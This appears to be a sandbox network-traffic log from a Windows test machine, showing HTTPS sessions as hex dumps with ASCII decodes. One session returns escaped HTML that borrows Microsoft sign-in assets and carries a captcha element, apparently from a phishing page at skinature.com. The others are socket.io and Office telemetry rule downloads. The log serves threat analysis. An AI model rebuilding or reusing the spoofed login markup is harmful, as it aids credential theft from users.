                                                                    2024-10-28 13:03:20 UTC8000INData Raw: 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 63 68 65 63 6b 62 6f 78 2d 77 72 61 70 70 65 72 2d 34 33 5c 78 32 30 69 6e 70 75 74 5b 74 79 70 65 3d 5c 78 32 32 63 68 65 63 6b 62 6f 78 5c 78 32 32 5d 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 64 69 73 70 6c 61 79 3a 5c 78 32 30 6e 6f 6e 65 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 76 69 73 69 62 69 6c 69 74 79 3a 5c 78 32 30 68 69 64 64 65 6e 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78
                                                                    Data Ascii: \x20\x20\x20\x0a\x20\x20\x20\x20.checkbox-wrapper-43\x20input[type=\x22checkbox\x22]\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20display:\x20none;\x0a\x20\x20\x20\x20\x20\x20\x20\x20visibility:\x20hidden;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x
                                                                    2024-10-28 13:03:20 UTC8000INData Raw: 64 65 42 61 72 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 64 69 73 70 6c 61 79 3a 5c 78 32 30 62 6c 6f 63 6b 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 73 69 64 65 42 61 72 3e 69 6d 67 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 3a 5c 78 32 30 31 30 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c
                                                                    Data Ascii: deBar\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20display:\x20block;\x0a\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20.sideBar>img\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20margin:\x2010px;\x0a\x20\x20\x20\
                                                                    2024-10-28 13:03:20 UTC8000INData Raw: 32 32 62 61 63 6b 41 72 72 6f 77 5c 78 32 32 5c 78 32 30 72 6f 6c 65 3d 5c 78 32 32 70 72 65 73 65 6e 74 61 74 69 6f 6e 5c 78 32 32 5c 78 32 30 70 6e 67 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 6c 65 66 74 5f 37 63 63 30 39 36 64 61 36 61 61 32 64 62 61 33 66 38 31 66 63 63 31 63 38 32 36 32 31 35 37 63 2e 70 6e 67 5c 78 32 32 5c 78 32 30 73 76 67 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 6c 65 66 74 5f 61 39 63 63 32 38 32 34 65 66 33
                                                                    Data Ascii: 22backArrow\x22\x20role=\x22presentation\x22\x20pngsrc=\x22https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.png\x22\x20svgsrc=\x22https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3
                                                                    2024-10-28 13:03:20 UTC8000INData Raw: 63 66 38 66 66 37 64 34 31 30 2e 73 76 67 5c 78 32 32 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 64 61 74 61 2d 62 69 6e 64 3d 5c 78 32 32 69 6d 67 53 72 63 5c 78 32 32 5c 78 32 30 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 6c 65 66 74 5f 61 39 63 63 32 38 32 34 65 66 33 35 31 37 62 36 63 34 31 36 30 64 63 66 38 66 66 37 64 34 31 30 2e 73 76 67 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32
                                                                    Data Ascii: cf8ff7d410.svg\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20data-bind=\x22imgSrc\x22\x20src=\x22https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg\x22>\x0a\x20\x2
                                                                    2024-10-28 13:03:20 UTC8000INData Raw: 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 21 2d 2d 5c 78 32 30 3c 69 6e 70 75 74 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 72 65 63 61 70 74 63 68 61 63 68 65 63 6b 62 6f 78 5c 78 32 32 5c 78 32 30 74 79 70 65 3d 5c 78 32 32 63 68 65 63 6b 62 6f 78 5c 78 32 32 5c 78 32 30 6e 61 6d 65 3d 5c 78 32 32 5c 78 32 32 5c 78 32 30 69 64 3d 5c 78 32 32 5c 78 32 32 3e 5c 78 32 30 2d 2d 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 72 65 63 61 70 74 63 68 61 73 75 62 5c 78 32 32 3e 5c
                                                                    Data Ascii: 0\x20\x20\x20\x20\x20\x20\x20\x20\x20...\x20<input\x20class=\x22recaptchacheckbox\x22\x20type=\x22checkbox\x22\x20name=\x22\x22\x20id=\x22\x22>\x20-->\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<div\x20class=\x22recaptchasub\x22>\


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    16192.168.2.44975518.245.31.894431704C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:19 UTC560OUTGET /4.7.5/socket.io.min.js HTTP/1.1
                                                                    Host: cdn.socket.io
                                                                    Connection: keep-alive
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    Origin: https://skinature.com
                                                                    sec-ch-ua-mobile: ?0
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Accept: */*
                                                                    Sec-Fetch-Site: cross-site
                                                                    Sec-Fetch-Mode: cors
                                                                    Sec-Fetch-Dest: script
                                                                    Referer: https://skinature.com/
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-10-28 13:03:19 UTC702INHTTP/1.1 200 OK
                                                                    Content-Type: application/javascript; charset=utf-8
                                                                    Content-Length: 49993
                                                                    Connection: close
                                                                    Accept-Ranges: bytes
                                                                    Access-Control-Allow-Origin: *
                                                                    Cache-Control: public, max-age=31536000, immutable
                                                                    Content-Disposition: inline; filename="socket.io.min.js"
                                                                    Date: Sat, 03 Aug 2024 07:26:50 GMT
                                                                    ETag: "777eb8fd4f8320b6e5cc9a7159bdec6a"
                                                                    Server: Vercel
                                                                    Strict-Transport-Security: max-age=63072000
                                                                    X-Vercel-Cache: HIT
                                                                    X-Vercel-Id: fra1::4xmtd-1722670010047-e30d468233ba
                                                                    X-Cache: Hit from cloudfront
                                                                    Via: 1.1 f996db233b87d6765cc5ad56701268d8.cloudfront.net (CloudFront)
                                                                    X-Amz-Cf-Pop: FRA56-P8
                                                                    X-Amz-Cf-Id: VfXpK7VkhjVXLILrWR5OQK6xMHdDY0hhu1h5eO0PFKY-q333TMWsbQ==
                                                                    Age: 7827990
                                                                    2024-10-28 13:03:20 UTC16384INData Raw: 2f 2a 21 0a 20 2a 20 53 6f 63 6b 65 74 2e 49 4f 20 76 34 2e 37 2e 35 0a 20 2a 20 28 63 29 20 32 30 31 34 2d 32 30 32 34 20 47 75 69 6c 6c 65 72 6d 6f 20 52 61 75 63 68 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 74 29 3a 28 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67
                                                                    Data Ascii: /*! * Socket.IO v4.7.5 * (c) 2014-2024 Guillermo Rauch * Released under the MIT License. */!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof g
                                                                    2024-10-28 13:03:20 UTC16384INData Raw: 66 20 64 6f 63 75 6d 65 6e 74 29 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 61 74 74 61 63 68 45 76 65 6e 74 29 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 75 6e 6c 6f 61 64 22 2c 61 65 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 29 7b 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6f 6e 70 61 67 65 68 69 64 65 22 69 6e 20 49 3f 22 70 61 67 65 68 69 64 65 22 3a 22 75 6e 6c 6f 61 64 22 2c 61 65 2c 21 31 29 7d 66 75 6e 63 74 69 6f 6e 20 61 65 28 29 7b 66 6f 72 28 76 61 72 20 65 20 69 6e 20 73 65 2e 72 65 71 75 65 73 74 73 29 73 65 2e 72 65 71 75 65 73 74 73 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 65 29 26 26 73 65 2e 72 65 71 75
                                                                    Data Ascii: f document)if("function"==typeof attachEvent)attachEvent("onunload",ae);else if("function"==typeof addEventListener){addEventListener("onpagehide"in I?"pagehide":"unload",ae,!1)}function ae(){for(var e in se.requests)se.requests.hasOwnProperty(e)&&se.requ
                                                                    2024-10-28 13:03:20 UTC16384INData Raw: 74 61 20 77 68 65 6e 20 72 65 63 6f 6e 73 74 72 75 63 74 69 6e 67 20 61 20 70 61 63 6b 65 74 22 29 3b 76 61 72 20 6e 3d 28 74 3d 74 68 69 73 2e 64 65 63 6f 64 65 53 74 72 69 6e 67 28 65 29 29 2e 74 79 70 65 3d 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 45 56 45 4e 54 3b 6e 7c 7c 74 2e 74 79 70 65 3d 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 41 43 4b 3f 28 74 2e 74 79 70 65 3d 6e 3f 42 65 2e 45 56 45 4e 54 3a 42 65 2e 41 43 4b 2c 74 68 69 73 2e 72 65 63 6f 6e 73 74 72 75 63 74 6f 72 3d 6e 65 77 20 50 65 28 74 29 2c 30 3d 3d 3d 74 2e 61 74 74 61 63 68 6d 65 6e 74 73 26 26 70 28 73 28 69 2e 70 72 6f 74 6f 74 79 70 65 29 2c 22 65 6d 69 74 52 65 73 65 72 76 65 64 22 2c 74 68 69 73 29 2e 63 61 6c 6c 28 74 68 69 73 2c 22 64 65 63 6f 64 65 64 22 2c 74 29 29 3a 70 28 73 28 69
                                                                    Data Ascii: ta when reconstructing a packet");var n=(t=this.decodeString(e)).type===Be.BINARY_EVENT;n||t.type===Be.BINARY_ACK?(t.type=n?Be.EVENT:Be.ACK,this.reconstructor=new Pe(t),0===t.attachments&&p(s(i.prototype),"emitReserved",this).call(this,"decoded",t)):p(s(i
                                                                    2024-10-28 13:03:20 UTC841INData Raw: 26 28 65 3d 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 22 2f 2f 22 2b 6e 2e 68 6f 73 74 29 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 28 22 2f 22 3d 3d 3d 65 2e 63 68 61 72 41 74 28 30 29 26 26 28 65 3d 22 2f 22 3d 3d 3d 65 2e 63 68 61 72 41 74 28 31 29 3f 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 65 3a 6e 2e 68 6f 73 74 2b 65 29 2c 2f 5e 28 68 74 74 70 73 3f 7c 77 73 73 3f 29 3a 5c 2f 5c 2f 2f 2e 74 65 73 74 28 65 29 7c 7c 28 65 3d 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 22 2f 2f 22 2b 65 3a 22 68 74 74 70 73 3a 2f 2f 22 2b 65 29 2c 72 3d 76 65 28 65 29 29 2c 72 2e 70 6f 72 74 7c 7c 28 2f 5e 28 68 74 74 70 7c 77 73 29 24 2f 2e 74 65 73 74 28 72 2e 70 72 6f 74 6f 63 6f 6c 29 3f 72 2e 70 6f 72 74 3d 22 38 30 22 3a 2f 5e 28 68 74
                                                                    Data Ascii: &(e=n.protocol+"//"+n.host),"string"==typeof e&&("/"===e.charAt(0)&&(e="/"===e.charAt(1)?n.protocol+e:n.host+e),/^(https?|wss?):\/\//.test(e)||(e=void 0!==n?n.protocol+"//"+e:"https://"+e),r=ve(e)),r.port||(/^(http|ws)$/.test(r.protocol)?r.port="80":/^(ht


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    17192.168.2.44976313.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:20 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:20 UTC470INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:20 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 415
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                    ETag: "0x8DC582B9F6F3512"
                                                                    x-ms-request-id: b99e46b1-a01e-001e-0499-2549ef000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130320Z-15b8d89586f8nxpt6ys645x5v0000000069g000000004tdk
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:20 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    18192.168.2.44976513.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:20 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:20 UTC470INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:20 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 632
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                    ETag: "0x8DC582BB6E3779E"
                                                                    x-ms-request-id: 91249574-801e-0078-3dc7-27bac6000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130320Z-17c5cb586f6hn8cl90dxzu28kw0000000510000000000746
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:20 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    19192.168.2.44976213.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:20 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:20 UTC491INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:20 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 474
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                    ETag: "0x8DC582B9964B277"
                                                                    x-ms-request-id: 7b93b929-d01e-0082-6676-27e489000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130320Z-16849878b78tg5n42kspfr0x48000000050g00000000e0g0
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache-Info: L1_T2
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:20 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    20192.168.2.44976413.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:20 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:20 UTC491INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:20 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 471
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                    ETag: "0x8DC582BB10C598B"
                                                                    x-ms-request-id: a2622e57-d01e-008e-28ea-28387a000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130320Z-r197bdfb6b4grkz4xgvkar0zcs00000004pg000000005e5m
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    X-Cache-Info: L1_T2
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:20 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    21192.168.2.44976613.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:20 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:20 UTC470INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:20 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 467
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                    ETag: "0x8DC582BA6C038BC"
                                                                    x-ms-request-id: 88497579-201e-0000-113a-26a537000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130320Z-17c5cb586f6zrq5bnguxgu7frc00000005sg0000000087qy
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:20 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    22192.168.2.44977550.87.179.2404431704C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
